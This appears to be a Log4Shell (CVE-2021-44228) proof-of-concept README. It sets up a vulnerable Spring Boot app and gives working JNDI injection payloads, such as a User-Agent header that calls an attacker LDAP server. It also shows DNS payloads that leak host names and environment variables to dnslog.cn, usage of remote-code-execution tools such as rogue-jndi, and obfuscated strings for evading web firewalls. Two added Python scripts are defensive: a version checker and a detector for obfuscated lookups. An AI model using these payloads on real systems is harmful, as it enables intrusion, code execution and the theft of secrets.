Associated Vulnerability
Title: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)

Description: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Description
Remote Code Injection In Log4j
Readme
# CVE-2021-44228 Remote Code Injection In Log4j
https://twitter.com/jas502n/status/1468946197629272066

### SpringBoot-pom.xml
Default dependency:
```xml
<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-web</artifactId>
</dependency>
```
**mvn dependency:tree**
```
[INFO] | | +- org.springframework.boot:spring-boot-starter-logging:jar:2.6.1:compile
[INFO] | | | +- ch.qos.logback:logback-classic:jar:1.2.7:compile
[INFO] | | | | \- ch.qos.logback:logback-core:jar:1.2.7:compile
[INFO] | | | +- org.apache.logging.log4j:log4j-to-slf4j:jar:2.14.1:compile
[INFO] | | | \- org.slf4j:jul-to-slf4j:jar:1.7.32:compile
[INFO] | | \- org.slf4j:slf4j-api:jar:1.7.32:compile
```
Change pom.xml to exclude the default logging starter and depend on log4j-core directly:
```xml
<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-web</artifactId>
    <exclusions>
        <exclusion>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-logging</artifactId>
        </exclusion>
    </exclusions>
</dependency>
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.1</version>
</dependency>
```
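The CVE description above scopes the issue to log4j-core 2.0-beta9 through 2.15.0, while the default Spring Boot tree pulls in only log4j-to-slf4j. As an added example (not part of the original README), this Python script classifies `mvn dependency:tree` output against that stated range; the function names are illustrative, and the sample tree lines marked as constructed are assumptions.

```python
import re

# Affected range as stated in the CVE-2021-44228 description quoted on this page:
# log4j-core 2.0-beta9 through 2.15.0, except the security releases below.
SECURITY_RELEASES = {"2.3.1", "2.12.2", "2.12.3"}
COORD = re.compile(r"org\.apache\.logging\.log4j:(log4j-[\w-]+):jar:([\w.-]+):\w+")
VERSION = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?")
STAGE_RANK = {"alpha": 0, "beta": 1, "rc": 2, None: 3}  # a GA release sorts last


def version_key(version):
    """Return a sortable tuple for a Log4j version string, or None if unparseable."""
    m = VERSION.fullmatch(version.lower())
    if m is None:
        return None
    major, minor, patch, stage, stage_no = m.groups()
    return (int(major), int(minor), int(patch or 0), STAGE_RANK[stage], int(stage_no or 0))


def classify(artifact, version):
    """Classify one Maven coordinate against the range in the CVE description."""
    if artifact != "log4j-core":
        return "not-log4j-core"      # the description limits the issue to log4j-core
    key = version_key(version)
    if key is None:
        return "unknown-version"     # e.g. a -SNAPSHOT build: needs manual review
    if version in SECURITY_RELEASES:
        return "patched"
    if version_key("2.0-beta9") <= key <= version_key("2.15.0"):
        return "affected"
    return "outside-range"


def scan_dependency_tree(text):
    """Return (artifact, version, verdict) for every Log4j coordinate in the output."""
    return [(m.group(1), m.group(2), classify(m.group(1), m.group(2)))
            for m in COORD.finditer(text)]


# The first line is taken from the tree on this page; the other two are constructed.
SAMPLE_TREE = """\
[INFO] | | | +- org.apache.logging.log4j:log4j-to-slf4j:jar:2.14.1:compile
[INFO] +- org.apache.logging.log4j:log4j-core:jar:2.14.1:compile
[INFO] | +- org.apache.logging.log4j:log4j-api:jar:2.14.1:compile
"""

if __name__ == "__main__":
    for artifact, version, verdict in scan_dependency_tree(SAMPLE_TREE):
        print(f"{artifact:16} {version:10} {verdict}")
```

The verdicts cover only the range given in the description quoted on this page.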
## Using the vulnerable environment
Usage:

```
$ java -jar log4jRCE-0.0.1-SNAPSHOT.jar
[*] CVE-2021-44228 Log4j2 Remote Code Injection
. ____ _ __ _ _
/\\ / ___'_ __ _ _(_)_ __ __ _ \ \ \ \
( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
\\/ ___)| |_)| | | | | || (_| | ) ) ) )
' |____| .__|_| |_|_| |_\__, | / / / /
=========|_|==============|___/=/_/_/_/
:: Spring Boot :: (v2.6.1)
2021-12-10 16:18:43.099 WARN 48536 --- [ main] o.s.boot.StartupInfoLogger : InetAddress.getLocalHost().getHostName() took 5005 milliseconds to respond. Please verify your network configuration (macOS machines may need to add entries to /etc/hosts).
2021-12-10 16:18:48.108 INFO 48536 --- [ main] c.example.log4jrce.Log4jRceApplication : Starting Log4jRceApplication v0.0.1-SNAPSHOT using Java 1.8.0_60 on JMacBookPro.local with PID 48536 (/Users/jas502n/IdeaProjects/log4jRCE/target/log4jRCE-0.0.1-SNAPSHOT.jar started by root in log4jRCE/target)
2021-12-10 16:18:48.109 INFO 48536 --- [ main] c.example.log4jrce.Log4jRceApplication : No active profile set, falling back to default profiles: default
2021-12-10 16:18:48.890 INFO 48536 --- [ main] o.s.b.w.embedded.tomcat.TomcatWebServer : Tomcat initialized with port(s): 8080 (http)
2021-12-10 16:18:48.902 INFO 48536 --- [ main] o.apache.catalina.core.StandardService : Starting service [Tomcat]
2021-12-10 16:18:48.902 INFO 48536 --- [ main] org.apache.catalina.core.StandardEngine : Starting Servlet engine: [Apache Tomcat/9.0.55]
2021-12-10 16:18:48.957 INFO 48536 --- [ main] o.a.c.c.C.[Tomcat].[localhost].[/] : Initializing Spring embedded WebApplicationContext
```
#### Burpsuite Send

```
POST /login HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

data=xxxxx
```
```
HTTP/1.1 200
Content-Type: text/html;charset=UTF-8
Content-Length: 15
Date: Fri, 10 Dec 2021 08:38:50 GMT
Connection: close

log4j2 success!
```
#### User-Agent Injection

```
GET / HTTP/1.1
Host: 192.168.3.105:18080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)${jndi:ldap://192.168.3.105:1389/o=reference} AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.3.105:18080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```
```
HTTP/1.1 200
Content-Type: image/avif;charset=UTF-8
Content-Length: 26
Date: Tue, 14 Dec 2021 13:08:14 GMT
Connection: close

User-Agent Inject Success!
```
Example: JDK jdk8-202



```java
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)${jndi:ldap://192.168.3.105:1389/o=tomcat} AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
2021-12-14 21:18:08.810 INFO 50619 --- [io-18080-exec-2] c.e.l.Log4jRceApplication : >>> Mozilla/5.0 (Windows NT 10.0; Win64; x64)javax.el.ELProcessor@7d97214f AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)${jndi:ldap://192.168.3.105:1389/o=groovy} AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
2021-12-14 21:19:34.516 INFO 50619 --- [io-18080-exec-3] c.e.l.Log4jRceApplication : >>> Mozilla/5.0 (Windows NT 10.0; Win64; x64)groovy.lang.GroovyShell@383ad44e AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
```

### Log4j2 Tips: Default Properties
The default Map is pre-populated with a value for **hostName**, which is the current system's host name or IP address.

Reference: https://www.docs4dev.com/docs/zh/log4j2/2.x/all/manual-configuration.html

`org.apache.logging.log4j.core.LoggerContext#setConfiguration`


```
${hostName}
${env:COMPUTERNAME}
${env:USERDOMAIN}
${env:LOGONSERVER}
```
Example:
```
// Log4j2 default property (Windows, Linux, macOS, ...)
${jndi:dns://${hostName}.iwk5r1.dnslog.cn}
// Equivalent to windows command(set|findstr your-hostname)
${jndi:dns://${env:COMPUTERNAME}.iwk5r1.dnslog.cn}
${jndi:dns://${env:USERDOMAIN}.iwk5r1.dnslog.cn}
```

### log4j for configLocation
log4j: Log4j configuration properties.
The expressions `${log4j:configLocation}` and `${log4j:configParentLocation}` provide the absolute path of the Log4j configuration file and of its parent folder, respectively.
```
${log4j:configLocation}
/xxx/apache-tomcat/webapps/xxxx/WEB-INF/classes/log4j2.xml
```
```
${log4j:configParentLocation}
/xxx/apache-tomcat/webapps/xxxx/WEB-INF/classes/
```
### JNDIExploit-Tools
01-feihong-cs/JNDIExploit
https://github.com/feihong-cs/JNDIExploit
usage:
```java
$ java -jar JNDIExploit-1.2-SNAPSHOT.jar -i vps_ip -p 8082
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8082...
```
02-welk1n/JNDI-Injection-Exploit
https://github.com/welk1n/JNDI-Injection-Exploit
usage:
```java
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open -a calculator" -A vip_ip
[ADDRESS] >> vip_ip
[COMMAND] >> open -a calculator
----------------------------JNDI Links----------------------------
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://vip_ip:1099/x6sufy
ldap://vip_ip:1389/x6sufy
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://vip_ip:1099/gh4u9h
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://vip_ip:1099/kwoimv
ldap://vip_ip:1389/kwoimv
```
03-veracode-research/rogue-jndi
https://github.com/veracode-research/rogue-jndi
usage:
```java
$ java -jar target/RogueJndi-1.1.jar --command "calc" --hostname "vip_ip"
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Starting HTTP server on 0.0.0.0:8000
Starting LDAP server on 0.0.0.0:1389
Mapping ldap://vip_ip:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://vip_ip:1389/o=reference to artsploit.controllers.RemoteReference
Mapping ldap://vip_ip:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://vip_ip:1389/o=groovy to artsploit.controllers.Groovy
Mapping ldap://vip_ip:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://vip_ip:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://vip_ip:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://vip_ip:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
```
04-welk1n/JNDI-Injection-Bypass
https://github.com/welk1n/JNDI-Injection-Bypass
usage:
```bash
$ java -cp JNDI-Injection-Bypass-1.0-SNAPSHOT-all.jar payloads.EvilRMIServer vip_ip
Creating evil RMI registry on port 1097
```
```xml
<!-- Expression Language 3.0.0 API (Apr 2013) -->
<!-- https://mvnrepository.com/artifact/javax.el/javax.el-api -->
<dependency>
    <groupId>javax.el</groupId>
    <artifactId>javax.el-api</artifactId>
    <version>3.0.0</version>
</dependency>
<!-- Apache Groovy 3.0.0: A powerful, dynamic language for the JVM -->
<!-- https://mvnrepository.com/artifact/org.codehaus.groovy/groovy -->
<dependency>
    <groupId>org.codehaus.groovy</groupId>
    <artifactId>groovy</artifactId>
    <version>3.0.0</version>
</dependency>
```
#### Using ${lower:xxx}, ${upper:xxx} or {::-n} to Bypass WAF
Use `"ı".toUpperCase()` to bypass the `I` in `JNDI`: `${JND${upper:ı}`

https://www.leavesongs.com/HTML/javascript-up-low-ercase-tip.html
Other:
```
[>] jndi inject model start...
[+] Raw payload:
${jndi:dns://${hostName}.b2hp8r.dnslog.cn}
[+] {[upper|lower]:x} Random obfuscate:
${${upper:j}nd${lower:i}:${lower:d}${lower:n}s://${h${lower:o}st${upper:N}ame}.b2${lower:h}p8r.${lower:d}nsl${lower:o}${lower:g}${lower:.}cn}
${${upper:j}nd${lower:i}:${lower:d}${lower:n}s://${h${lower:o}st${upper:n}ame}.b2${lower:h}p8r.${lower:d}nsl${lower:o}${lower:g}${lower:.}cn}
[+] {[upper|lower]:x} all the obfuscate:
${${upper:j}${lower:n}${lower:d}${lower:i}${lower::}${lower:d}${lower:n}${lower:s}${lower::}${lower:/}${lower:/}${${lower:h}${lower:o}${lower:s}${lower:t}${upper:N}${lower:a}${lower:m}${lower:e}}${lower:.}${lower:b}${lower:2}${lower:h}${lower:p}${lower:8}${lower:r}${lower:.}${lower:d}${lower:n}${lower:s}${lower:l}${lower:o}${lower:g}${lower:.}${lower:c}${lower:n}}
${${upper:j}${lower:n}${lower:d}${lower:i}${lower::}${lower:d}${lower:n}${lower:s}${lower::}${lower:/}${lower:/}${${lower:h}${lower:o}${lower:s}${lower:t}${upper:n}${lower:a}${lower:m}${lower:e}}${lower:.}${lower:b}${lower:2}${lower:h}${lower:p}${lower:8}${lower:r}${lower:.}${lower:d}${lower:n}${lower:s}${lower:l}${lower:o}${lower:g}${lower:.}${lower:c}${lower:n}}
[+] {::-n} random obfuscate:
${j${zG:xuc:-n}d${wXuN:-i}:dns:/${emWDv:Jdq:-/}${${RfdM:txf:-h}o${O:atnIDv:-s}${O:YM:sdm:fP:DPYEXx:-t}${fiShn:P:NA:-N}${v:h:rLVoL:-a}me}.b2${Ld:Tnzo:-h}p${cCC:-8}r${aoq:FF:-.}dnslog.${GL:-c}n}
[+] {::-n} all the obfuscate:
${${ogEqGS:RDg:fUxz:-j}${ldB:E:N:PG:-n}${VzvPou:-d}${lr:oRfT:-i}${nw:-:}${j:-d}${EcFIy:YQUG:zKWwP:jNq:DjGp:-n}${sjydOt:S:eCS:QQ:xRDd:-s}${nLj:F:TptB:-:}${WqfK:rWy:YVXz:-/}${jyvggg:wrwT:hp:-/}${${Pw:-h}${R:-o}${Y:bhV:-s}${sNr:Oiv:RBRrv:ISrLbB:rCBSw:-t}${h:JeAg:-N}${Se:L:dxEa:Ssx:-a}${HYtfSz:AInf:gHTSJ:LkD:Wxqq:-m}${uxdytq:-e}}${EBxUv:wf:UmUc:dIDP:-.}${k:x:Fq:muQmwT:-b}${XioYP:Qc:-2}${Gnr:NY:-h}${YhRuP:tIAVJ:W:-p}${veLxt:pVKX:MPGdO:lNo:LXWtN:-8}${NqPAoG:lhEirn:QhJOS:QIMJ:-r}${wx:-.}${H:wA:UTu:s:TwBzM:-d}${VGlR:CXlxMV:PSJ:-n}${b:wMDG:wn:PjYam:-s}${Nmdg:y:sNnW:-l}${rF:GRmC:-o}${RkV:QRb:-g}${LDBWIn:dMxv:-.}${pNgiK:az:arNf:-c}${OgV:XPTn:-n}}
[=] jndi inject model stop
```
https://github.com/woodpecker-appstore/log4j-payload-generator

#### log4j-::
Example:
```
${::-n}
2021-12-14 11:08:49.287 ERROR 31355 --- [io-18080-exec-4] c.e.l.Log4jRceApplication : >>> n
${xxx::-n}
2021-12-14 11:07:24.785 ERROR 31355 --- [io-18080-exec-1] c.e.l.Log4jRceApplication : >>> n
${:xxx:-n}
2021-12-14 11:08:18.012 ERROR 31355 --- [io-18080-exec-3] c.e.l.Log4jRceApplication : >>> n
${:-n}
2021-12-14 11:11:10.135 ERROR 31355 --- [io-18080-exec-3] c.e.l.Log4jRceApplication : >>> n
${:-jndi}
2021-12-14 11:10:43.420 ERROR 31355 --- [io-18080-exec-1] c.e.l.Log4jRceApplication : >>> jndi
```
#### log4j-lower
```java
this.strLookupMap.put("lower", new LowerLookup());
```
**org.apache.logging.log4j.core.lookup.LowerLookup#lookup(org.apache.logging.log4j.core.LogEvent, java.lang.String)**
```java
package org.apache.logging.log4j.core.lookup;

import org.apache.logging.log4j.core.LogEvent;
import org.apache.logging.log4j.core.config.plugins.Plugin;

@Plugin(
    name = "lower",
    category = "Lookup"
)
public class LowerLookup implements StrLookup {
    public LowerLookup() {
    }

    public String lookup(final String key) {
        return key != null ? key.toLowerCase() : null; // toLowerCase()
    }

    public String lookup(final LogEvent event, final String key) {
        return this.lookup(key);
    }
}
```
Example:
```java
data=${lower:JNDI}
2021-12-14 10:05:12.051 ERROR 31355 --- [io-18080-exec-6] c.e.l.Log4jRceApplication : >>> jndi
```
#### log4j-upper
```java
this.strLookupMap.put("upper", new UpperLookup());
```
**org.apache.logging.log4j.core.lookup.UpperLookup#lookup(org.apache.logging.log4j.core.LogEvent, java.lang.String)**
```java
package org.apache.logging.log4j.core.lookup;

import org.apache.logging.log4j.core.LogEvent;
import org.apache.logging.log4j.core.config.plugins.Plugin;

@Plugin(
    name = "upper",
    category = "Lookup"
)
public class UpperLookup implements StrLookup {
    public UpperLookup() {
    }

    public String lookup(final String key) {
        return key != null ? key.toUpperCase() : null;
    }

    public String lookup(final LogEvent event, final String key) {
        return this.lookup(key);
    }
}
```
Example:
```java
data=${upper:jndi}
2021-12-14 10:08:29.286 ERROR 31355 --- [io-18080-exec-8] c.e.l.Log4jRceApplication : >>> JNDI
```
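A defender-side check for the `${lower:}`, `${upper:}` and `${name:-default}` obfuscations shown in the sections above, added here and not part of the original README: it resolves nested lookups innermost-first and reports any that end up with a `jndi` prefix. The function names are illustrative, and the sample lines are constructed using reserved documentation addresses.

```python
import re

# Innermost lookup: "${" ... "}" whose body holds no nested "${" and no "}".
INNERMOST = re.compile(r"\$\{((?:(?!\$\{)[^}])*)\}")


def resolve_innermost(body, hits):
    """Evaluate one lookup body; record it in hits if it is a jndi lookup."""
    name, has_default, default = body.partition(":-")   # ${name:-default}
    prefix, has_colon, key = name.partition(":")
    prefix = prefix.lower()          # compare prefixes case-insensitively
    if has_colon and prefix == "jndi":
        hits.append(name)            # flag it even when a default value follows
        return "<jndi>"
    if has_colon and prefix == "lower":
        return key.lower()
    if has_colon and prefix == "upper":
        return key.upper()           # "ı".upper() == "I", as in the page's example
    if has_default:
        return default               # assumption: the lookup fails, e.g. ${::-n}
    return "<" + name + ">"          # env, sys, hostName, ...: value unknown here


def find_jndi_lookups(text, max_passes=32):
    """Return every jndi lookup that appears once nested lookups are resolved."""
    hits = []
    for _ in range(max_passes):      # bounded, so crafted input cannot loop forever
        resolved = INNERMOST.sub(lambda m: resolve_innermost(m.group(1), hits), text)
        if resolved == text:
            break
        text = resolved
    return hits


def scan_lines(lines):
    """Return (line_number, lookup) pairs for a list of log or request lines."""
    return [(number, hit)
            for number, line in enumerate(lines, start=1)
            for hit in find_jndi_lookups(line)]


# Constructed sample input; 192.0.2.10 and example.test are reserved for documentation.
SAMPLE_LINES = [
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "User-Agent: Mozilla/5.0 ${jndi:ldap://192.0.2.10:1389/a}",
    "data=${${upper:j}nd${lower:I}:${lower:D}ns://${h${lower:o}stName}.example.test}",
    "data=${j${zG:xuc:-n}d${wXuN:-i}:dns://${::-x}.example.test}",
    "data=${JND${upper:ı}:ldap://example.test/a}",
    "data=${env:HOME} ${java:version} ${:-jndi}",
]

if __name__ == "__main__":
    for number, hit in scan_lines(SAMPLE_LINES):
        print(f"line {number}: {hit}")
```

Lookups whose value is unknown at scan time are replaced with a `<name>` marker, and an unknown lookup with a default is assumed to fall back to that default, so the check errs toward reporting.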
#### log4j-java
| ID | usage | method |
| ---- | ----- | ------ |
|1|${java:version}|getSystemProperty("java.version")|
|2|${java:runtime}|getRuntime()|
|3|${java:vm}|getVirtualMachine()|
|4|${java:os}|getOperatingSystem()|
|5|${java:hw}|getHardware()|
|6|${java:locale}|getLocale()|

**org.apache.logging.log4j.core.lookup.JavaLookup**
```java
public String getHardware() {
    return "processors: " + Runtime.getRuntime().availableProcessors() + ", architecture: " + this.getSystemProperty("os.arch") + this.getSystemProperty("-", "sun.arch.data.model") + this.getSystemProperty(", instruction sets: ", "sun.cpu.isalist");
}

public String getLocale() {
    return "default locale: " + Locale.getDefault() + ", platform encoding: " + this.getSystemProperty("file.encoding");
}

public String getOperatingSystem() {
    return this.getSystemProperty("os.name") + " " + this.getSystemProperty("os.version") + this.getSystemProperty(" ", "sun.os.patch.level") + ", architecture: " + this.getSystemProperty("os.arch") + this.getSystemProperty("-", "sun.arch.data.model");
}

public String getRuntime() {
    return this.getSystemProperty("java.runtime.name") + " (build " + this.getSystemProperty("java.runtime.version") + ") from " + this.getSystemProperty("java.vendor");
}

private String getSystemProperty(final String name) {
    return this.spLookup.lookup(name);
}

public String getVirtualMachine() {
    return this.getSystemProperty("java.vm.name") + " (build " + this.getSystemProperty("java.vm.version") + ", " + this.getSystemProperty("java.vm.info") + ")";
}
```
##### log4j2-env
###### Linux:
```properties
CLASSPATH,HOME,JAVA_HOME,LANG,LC_TERMINAL,LC_TERMINAL_VERSION,LESS,LOGNAME,LSCOLORS,LS_COLORS,MAIL,NLSPATH,OLDPWD,PAGER,PATH,PWD,SHELL,SHLVL,SSH_CLIENT,SSH_CONNECTION,SSH_TTY,TERM,USER,XDG_RUNTIME_DIR,XDG_SESSION_ID,XFILESEARCHPATH,ZSH,_
```
| id | usage |
| ---- | ----- |
|1|${env:CLASSPATH}|
|2|${env:HOME}|
|3|${env:JAVA_HOME}|
|4|${env:LANG}|
|5|${env:LC_TERMINAL}|
|6|${env:LC_TERMINAL_VERSION}|
|7|${env:LESS}|
|8|${env:LOGNAME}|
|9|${env:LSCOLORS}|
|10|${env:LS_COLORS}|
|11|${env:MAIL}|
|12|${env:NLSPATH}|
|13|${env:OLDPWD}|
|14|${env:PAGER}|
|15|${env:PATH}|
|16|${env:PWD}|
|17|${env:SHELL}|
|18|${env:SHLVL}|
|19|${env:SSH_CLIENT}|
|20|${env:SSH_CONNECTION}|
|21|${env:SSH_TTY}|
|22|${env:TERM}|
|23|${env:USER}|
|24|${env:XDG_RUNTIME_DIR}|
|25|${env:XDG_SESSION_ID}|
|26|${env:XFILESEARCHPATH}|
|27|${env:ZSH}|
###### Windows:
```properties
=E:,=ExitCode,A8_HOME,A8_ROOT_BIN,ALLUSERSPROFILE,APPDATA,CATALINA_BASE,CATALINA_HOME,CATALINA_OPTS,CATALINA_TMPDIR,CLASSPATH,CLIENTNAME,COMPUTERNAME,ComSpec,CommonProgramFiles,CommonProgramFiles(x86),CommonProgramW6432,FP_NO_HOST_CHECK,HOMEDRIVE,HOMEPATH,JRE_HOME,Java_Home,LOCALAPPDATA,LOGONSERVER,NUMBER_OF_PROCESSORS,OS,PATHEXT,PROCESSOR_ARCHITECTURE,PROCESSOR_IDENTIFIER,PROCESSOR_LEVEL,PROCESSOR_REVISION,PROMPT,PSModulePath,PUBLIC,Path,ProgramData,ProgramFiles,ProgramFiles(x86),ProgramW6432,SESSIONNAME,SystemDrive,SystemRoot,TEMP,TMP,ThisExitCode,USERDOMAIN,USERNAME,USERPROFILE,WORK_PATH,windir,windows_tracing_flags,windows_tracing_logfile
```
| id | usage |
| ---- | ----- |
|1|${env:A8_HOME}|
|2|${env:A8_ROOT_BIN}|
|3|${env:ALLUSERSPROFILE}|
|4|${env:APPDATA}|
|5|${env:CATALINA_BASE}|
|6|${env:CATALINA_HOME}|
|7|${env:CATALINA_OPTS}|
|8|${env:CATALINA_TMPDIR}|
|9|${env:CLASSPATH}|
|10|${env:CLIENTNAME}|
|11|${env:COMPUTERNAME}|
|12|${env:ComSpec}|
|13|${env:CommonProgramFiles}|
|14|${env:CommonProgramFiles(x86)}|
|15|${env:CommonProgramW6432}|
|16|${env:FP_NO_HOST_CHECK}|
|17|${env:HOMEDRIVE}|
|18|${env:HOMEPATH}|
|19|${env:JRE_HOME}|
|20|${env:Java_Home}|
|21|${env:LOCALAPPDATA}|
|22|${env:LOGONSERVER}|
|23|${env:NUMBER_OF_PROCESSORS}|
|24|${env:OS}|
|25|${env:PATHEXT}|
|26|${env:PROCESSOR_ARCHITECTURE}|
|27|${env:PROCESSOR_IDENTIFIER}|
|28|${env:PROCESSOR_LEVEL}|
|29|${env:PROCESSOR_REVISION}|
|30|${env:PROMPT}|
|31|${env:PSModulePath}|
|32|${env:PUBLIC}|
|33|${env:Path}|
|34|${env:ProgramData}|
|35|${env:ProgramFiles}|
|36|${env:ProgramFiles(x86)}|
|37|${env:ProgramW6432}|
|38|${env:SESSIONNAME}|
|39|${env:SystemDrive}|
|40|${env:SystemRoot}|
|41|${env:TEMP}|
|42|${env:TMP}|
|43|${env:ThisExitCode}|
|44|${env:USERDOMAIN}|
|45|${env:USERNAME}|
|46|${env:USERPROFILE}|
|47|${env:WORK_PATH}|
|48|${env:windir}|
|49|${env:windows_tracing_flags}|
|50|${env:windows_tracing_logfile}|
###### Mac:
```properties
ANT_HOME,COMMAND_MODE,GOBIN,GOPATH,GOROOT,GRADLE_HOME,HOME,HOMEBREW_BOTTLE_DOMAIN,JAVA_HOME,JAVA_MAIN_CLASS_3651,LC_CTYPE,LESS,LOGNAME,LSCOLORS,LaunchInstanceID,OLDPWD,PAGER,PATH,PWD,SECURITYSESSIONID,SHELL,SSH_AUTH_SOCK,TIME_STYLE,TMPDIR,USER,VERSIONER_PYTHON_VERSION,XPC_FLAGS,XPC_SERVICE_NAME,ZSH,__CF_USER_TEXT_ENCODING
```
| id | usage |
| ---- | ----- |
|1|${env:ANT_HOME}|
|2|${env:COMMAND_MODE}|
|3|${env:GOBIN}|
|4|${env:GOPATH}|
|5|${env:GOROOT}|
|6|${env:GRADLE_HOME}|
|7|${env:HOME}|
|8|${env:HOMEBREW_BOTTLE_DOMAIN}|
|9|${env:JAVA_HOME}|
|10|${env:JAVA_MAIN_CLASS_3651}|
|11|${env:LC_CTYPE}|
|12|${env:LESS}|
|13|${env:LOGNAME}|
|14|${env:LSCOLORS}|
|15|${env:LaunchInstanceID}|
|16|${env:OLDPWD}|
|17|${env:PAGER}|
|18|${env:PATH}|
|19|${env:PWD}|
|20|${env:SECURITYSESSIONID}|
|21|${env:SHELL}|
|22|${env:SSH_AUTH_SOCK}|
|23|${env:TIME_STYLE}|
|24|${env:TMPDIR}|
|25|${env:USER}|
|26|${env:VERSIONER_PYTHON_VERSION}|
|27|${env:XPC_FLAGS}|
|28|${env:XPC_SERVICE_NAME}|
|29|${env:ZSH}|
##### log4j2-sys
| id | usage |
| ---- | ----- |
|1|${sys:awt.toolkit}|
|2|${sys:file.encoding}|
|3|${sys:file.encoding.pkg}|
|4|${sys:file.separator}|
|5|${sys:java.awt.graphicsenv}|
|6|${sys:java.awt.printerjob}|
|7|${sys:java.class.path}|
|8|${sys:java.class.version}|
|9|${sys:java.endorsed.dirs}|
|10|${sys:java.ext.dirs}|
|11|${sys:java.home}|
|12|${sys:java.io.tmpdir}|
|13|${sys:java.library.path}|
|14|${sys:java.runtime.name}|
|15|${sys:java.runtime.version}|
|16|${sys:java.specification.name}|
|17|${sys:java.specification.vendor}|
|18|${sys:java.specification.version}|
|19|${sys:java.vendor}|
|20|${sys:java.vendor.url}|
|21|${sys:java.vendor.url.bug}|
|22|${sys:java.version}|
|23|${sys:java.vm.info}|
|24|${sys:java.vm.name}|
|25|${sys:java.vm.specification.name}|
|26|${sys:java.vm.specification.vendor}|
|27|${sys:java.vm.specification.version}|
|28|${sys:java.vm.vendor}|
|29|${sys:java.vm.version}|
|30|${sys:line.separator}|
|31|${sys:os.arch}|
|32|${sys:os.name}|
|33|${sys:os.version}|
|34|${sys:path.separator}|
|35|${sys:sun.arch.data.model}|
|36|${sys:sun.boot.class.path}|
|37|${sys:sun.boot.library.path}|
|38|${sys:sun.cpu.endian}|
|39|${sys:sun.cpu.isalist}|
|40|${sys:sun.desktop}|
|41|${sys:sun.io.unicode.encoding}|
|42|${sys:sun.java.command}|
|43|${sys:sun.java.launcher}|
|44|${sys:sun.jnu.encoding}|
|45|${sys:sun.management.compiler}|
|46|${sys:sun.os.patch.level}|
|47|${sys:sun.stderr.encoding}|
|48|${sys:user.country}|
|49|${sys:user.dir}|
|50|${sys:user.home}|
|51|${sys:user.language}|
|52|${sys:user.name}|
|53|${sys:user.script}|
|54|${sys:user.timezone}|
|55|${sys:user.variant}|

File Snapshot
[4.0K] /data/pocs/6d3c4e1f41247418d094eed584b50a4ac7d55c8e
├── [ 25M] log4jRCE-0.0.1-SNAPSHOT.jar
└── [ 22K] README.md
0 directories, 2 files